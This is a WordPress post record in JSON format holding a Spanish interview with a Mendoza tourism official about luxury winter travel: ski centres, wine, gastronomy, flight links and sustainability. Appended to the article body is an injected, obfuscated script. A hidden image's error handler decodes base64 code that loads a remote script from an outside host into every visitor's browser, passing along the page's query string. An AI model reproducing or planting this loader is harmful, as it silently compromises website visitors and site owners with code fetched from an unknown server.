{"id":9812,"date":"2025-07-25T08:39:01","date_gmt":"2025-07-25T11:39:01","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=9812"},"modified":"2025-08-13T15:25:22","modified_gmt":"2025-08-13T18:25:22","slug":"mendoza-un-destino-invernal-de-lujo-que-combina-aventura-gastronomia-y-paisajes-inolvidables","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=9812","title":{"rendered":"Mendoza, un destino invernal de lujo que combina aventura, gastronom\u00eda y paisajes inolvidables"},"content":{"rendered":"\n<p><strong><em>Cristina Mengarelli, Directora de Promoci\u00f3n Tur\u00edstica e Inteligencia de Mercados del Ente Mendoza Turismo (Emetur), comparte c\u00f3mo la provincia se consolida como un destino de invierno premium, con propuestas que integran confort, naturaleza, gastronom\u00eda de excelencia y un fuerte compromiso con la sustentabilidad<\/em><\/strong><\/p>\n\n\n\n<p><strong>\u00bfC\u00f3mo describir\u00eda la experiencia que puede vivir una familia en Mendoza durante el invierno, combinando lujo, descanso y aventura?<\/strong><\/p>\n\n\n\n<p>Si bien Mendoza es un destino para disfrutar todo el a\u00f1o, el invierno tiene caracter\u00edsticas \u00fanicas. La nieve transforma el paisaje y lo ti\u00f1e de blanco, generando un contraste inolvidable con los colores de otras estaciones. El sol, caracter\u00edstico de nuestra provincia, acompa\u00f1a durante los mediod\u00edas y tardes, creando momentos memorables.<\/p>\n\n\n\n<p>La gastronom\u00eda mendocina se adapta a las bajas temperaturas, evocando sabores c\u00e1lidos y hogare\u00f1os, mientras que nuestros vinos aportan un maridaje perfecto. Alojamientos como lodges o hoteles cinco estrellas permiten descansar y organizar actividades en parques de monta\u00f1a como Los Puquios o el Real del Pehuenche, as\u00ed como en centros de esqu\u00ed como El Azufre y Las Le\u00f1as. Todo est\u00e1 al alcance: caminatas, esqu\u00ed, snowboard y actividades recreativas, siempre con la cordillera de los Andes como tel\u00f3n de fondo.<\/p>\n\n\n\n<p>Adem\u00e1s, nuestras ciudades ofrecen una vibrante vida nocturna, junto con propuestas culturales y enogastron\u00f3micas que completan la experiencia.<\/p>\n\n\n\n<p><strong>\u00bfCu\u00e1les son las actividades m\u00e1s recomendadas para quienes buscan experiencias premium en la nieve?<\/strong><\/p>\n\n\n\n<p>Sin lugar a dudas, la combinaci\u00f3n de deportes de nieve con degustaciones de platos t\u00edpicos mendocinos y nuestros vinos reconocidos internacionalmente conforma una experiencia integral y sofisticada.<\/p>\n\n\n\n<p><strong>\u00bfC\u00f3mo se preparan para atender a un visitante exigente que busca confort, servicio y contacto con la naturaleza?<\/strong><\/p>\n\n\n\n<p>Mendoza cuenta con una amplia oferta de alta gama: desde restaurantes galardonados con Estrellas Michelin hasta hoteles cinco estrellas de cadenas internacionales y exclusivos lodges inmersos en paisajes imponentes.<br>Nuestra conectividad a\u00e9rea tambi\u00e9n es un punto fuerte, con vuelos que llegan desde hubs como Buenos Aires, Lima, S\u00e3o Paulo, Campinas, R\u00edo de Janeiro, Santiago de Chile y Panam\u00e1.<\/p>\n\n\n\n<p>Adem\u00e1s, ofrecemos una agenda cultural diversa y activa, con espect\u00e1culos de primer nivel en los 18 departamentos de la provincia, ideal para toda la familia.<\/p>\n\n\n\n<p><strong>\u00bfQu\u00e9 estrategias est\u00e1n desarrollando para posicionar Mendoza como un destino invernal de alta gama?<\/strong><\/p>\n\n\n\n<p>Recientemente lanzamos la campa\u00f1a \u201cMendoza, manso destino\u201d, que r\u00e1pidamente se volvi\u00f3 viral en redes sociales y logr\u00f3 llegar a p\u00fablicos tanto nacionales como internacionales.<\/p>\n\n\n\n<p>Adem\u00e1s, participamos en ferias dentro y fuera del pa\u00eds, donde nos conectamos con periodistas, operadores tur\u00edsticos y potenciales visitantes. Todas estas acciones se desarrollan desde Emetur, en articulaci\u00f3n con el sector privado, los municipios y el Gobierno Nacional.<\/p>\n\n\n\n<p><strong>\u00bfC\u00f3mo describen la actualidad del turismo en la provincia y qu\u00e9 expectativas tienen para esta temporada y el mediano plazo?<\/strong><\/p>\n\n\n\n<p>Mendoza se encuentra por encima del promedio nacional, resultado de un trabajo constante que nos ha permitido reducir la estacionalidad y atraer visitantes durante todo el a\u00f1o. Somos optimistas respecto al futuro del turismo en la provincia. Las agencias, aerol\u00edneas y turistas contin\u00faan eligi\u00e9ndonos por la calidad y variedad de nuestras propuestas.<\/p>\n\n\n\n<p><strong>\u00bfQu\u00e9 propuestas vinculadas a la sustentabilidad y al cuidado del entorno est\u00e1n integrando en la oferta tur\u00edstica de invierno?<\/strong><\/p>\n\n\n\n<p>Mendoza siempre ha tenido una visi\u00f3n clara respecto al cuidado ambiental. Somos un desierto convertido en oasis gracias al trabajo de generaciones de mendocinos. Por eso, la sustentabilidad y el respeto por los recursos est\u00e1n presentes en todas nuestras acciones, m\u00e1s all\u00e1 de la temporada. Cada desarrollo tur\u00edstico se sustenta en el cuidado del entorno, reafirmando nuestro compromiso con un futuro responsable.<\/p>\n\n\n\n<p>Fuente: INPROTUR.<\/p>\n<p>\u00a0<\/p>\n\n\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Cristina Mengarelli, Directora de Promoci\u00f3n Tur\u00edstica e Inteligencia de Mercados del Ente Mendoza Turismo (Emetur), comparte c\u00f3mo la provincia se consolida como un destino de invierno premium, con propuestas que integran confort, naturaleza, gastronom\u00eda de excelencia y un fuerte compromiso con la sustentabilidad \u00bfC\u00f3mo describir\u00eda la experiencia que puede vivir una familia en Mendoza durante [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":9813,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[10,15],"tags":[],"class_list":["post-9812","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-cuyo","category-turismo-de-bienestar"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/9812","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9812"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/9812\/revisions"}],"predecessor-version":[{"id":9881,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/9812\/revisions\/9881"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/9813"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9812"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9812"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9812"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}